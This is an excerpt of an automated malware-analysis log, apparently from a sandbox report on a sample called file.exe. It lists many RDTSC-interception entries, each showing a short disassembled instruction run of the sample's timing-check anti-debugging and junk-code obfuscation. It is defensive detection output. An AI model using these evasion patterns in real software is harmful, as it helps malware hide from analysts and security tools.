Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361020 second address: 1361024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361024 second address: 136104B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FF674E409BAh 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136104B second address: 1361052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361052 second address: 1361058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361197 second address: 136119B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136119B second address: 13611B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF674E409C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136134B second address: 1361363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6744C8CA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361363 second address: 136138A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF674E409B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d jne 00007FF674E409D7h 0x00000013 push eax 0x00000014 jmp 00007FF674E409C1h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13616AC second address: 13616CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FF6744C8C9Ch 0x0000000f js 00007FF6744C8C96h 0x00000015 jmp 00007FF6744C8C9Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361CE0 second address: 1361CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361CE6 second address: 1361CFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF6744C8C9Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361CFF second address: 1361D05 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361FBC second address: 1361FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361FC2 second address: 1361FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361FCE second address: 1361FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF6744C8CA0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1362BD3 second address: 1362C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FF674E409BAh 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 jmp 00007FF674E409C7h 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 jnl 00007FF674E409CCh 0x0000001e popad 0x0000001f push edi 0x00000020 jmp 00007FF674E409C8h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF674E409BFh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136B5DA second address: 136B5F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136B5F6 second address: 136B60A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FF674E409B6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FF674E409B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136B768 second address: 136B76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136B76C second address: 136B78F instructions: 0x00000000 rdtsc 0x00000002 js 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FF674E409C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136B8CD second address: 136B8E5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF6744C8C96h 0x00000008 jne 00007FF6744C8C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007FF6744C8C9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136BB8B second address: 136BB8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136BB8F second address: 136BB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136BB95 second address: 136BB9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136BB9A second address: 136BBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF6744C8C96h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136BD13 second address: 136BD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BEC4 second address: 136BEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C144 second address: 136C14A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372934 second address: 137293C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372BE3 second address: 1372BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF674E409B6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372BF5 second address: 1372C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF6744C8C9Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372D6C second address: 1372D7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF674E409B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372D7D second address: 1372DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF6744C8CA5h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF6744C8CA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373527 second address: 1373538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373538 second address: 1373542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373542 second address: 1373548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA89 second address: 137AA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA8D second address: 137AA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA96 second address: 137AA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AA9E second address: 137AAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AAA5 second address: 137AAAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF6744C8C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AAAF second address: 137AAC1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FF674E409B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AAC1 second address: 137AAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AAC5 second address: 137AAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007FF674E409B6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AC22 second address: 137AC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FF6744C8CADh 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF6744C8CA5h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AC5F second address: 137AC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137AC63 second address: 137AC70 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138A136 second address: 138A148 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FF674E409B8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138A148 second address: 138A161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6744C8CA4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138A161 second address: 138A167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138A167 second address: 138A18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FF6744C8C9Ch 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF6744C8C9Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138A18F second address: 138A1B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF674E409C3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1392A49 second address: 1392A59 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF6744C8CA2h 0x00000008 jng 00007FF6744C8C96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1392A59 second address: 1392A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139CFC0 second address: 139CFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FF6744C8C96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A6219 second address: 13A621D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A621D second address: 13A6228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A53EC second address: 13A53F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A53F2 second address: 13A53F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A53F6 second address: 13A53FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A5542 second address: 13A5548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8F3C second address: 13A8F40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8F40 second address: 13A8F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FF6744C8CA2h 0x0000000c ja 00007FF6744C8CA0h 0x00000012 jmp 00007FF6744C8C9Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007FF6744C8C96h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8AA9 second address: 13A8AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8AAF second address: 13A8ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6744C8CA8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8ACD second address: 13A8AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8C34 second address: 13A8C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Eh 0x00000007 jng 00007FF6744C8C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF6744C8CA8h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8C64 second address: 13A8C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13A8C7A second address: 13A8C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AF2DF second address: 13AF2E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AF2E5 second address: 13AF311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF6744C8C9Fh 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FF6744C8C9Fh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BAD5B second address: 13BAD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BAD66 second address: 13BAD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BAD6A second address: 13BAD70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BAD70 second address: 13BAD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BAD7A second address: 13BAD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BAD7E second address: 13BAD88 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6744C8C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BAD88 second address: 13BAD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C7BC4 second address: 13C7BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C7BC8 second address: 13C7BD2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C7BD2 second address: 13C7BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C7BD6 second address: 13C7BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D8603 second address: 13D8609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D73D9 second address: 13D73DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D786C second address: 13D7871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D7A15 second address: 13D7A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF674E409B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D7A20 second address: 13D7A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FF6744C8C96h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D7CF0 second address: 13D7CFA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF674E409B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D7CFA second address: 13D7D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D7D06 second address: 13D7D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DAF5D second address: 13DAF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DB1EF second address: 13DB1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DB1F3 second address: 13DB1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DB1F9 second address: 13DB203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF674E409B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DB435 second address: 13DB439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DB439 second address: 13DB44A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FF674E409B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DB44A second address: 13DB4A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c jc 00007FF6744C8CA2h 0x00000012 jne 00007FF6744C8C9Ch 0x00000018 push dword ptr [ebp+1244749Bh] 0x0000001e call 00007FF6744C8CA4h 0x00000023 call 00007FF6744C8C9Eh 0x00000028 mov dx, FA32h 0x0000002c pop edx 0x0000002d pop edx 0x0000002e push 0D4E84F9h 0x00000033 push eax 0x00000034 push edx 0x00000035 jnc 00007FF6744C8C9Ch 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DE39E second address: 13DE3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 je 00007FF674E409B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DE3AD second address: 13DE3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA3h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 je 00007FF6744C8C96h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DE3D2 second address: 13DE3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF674E409C2h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
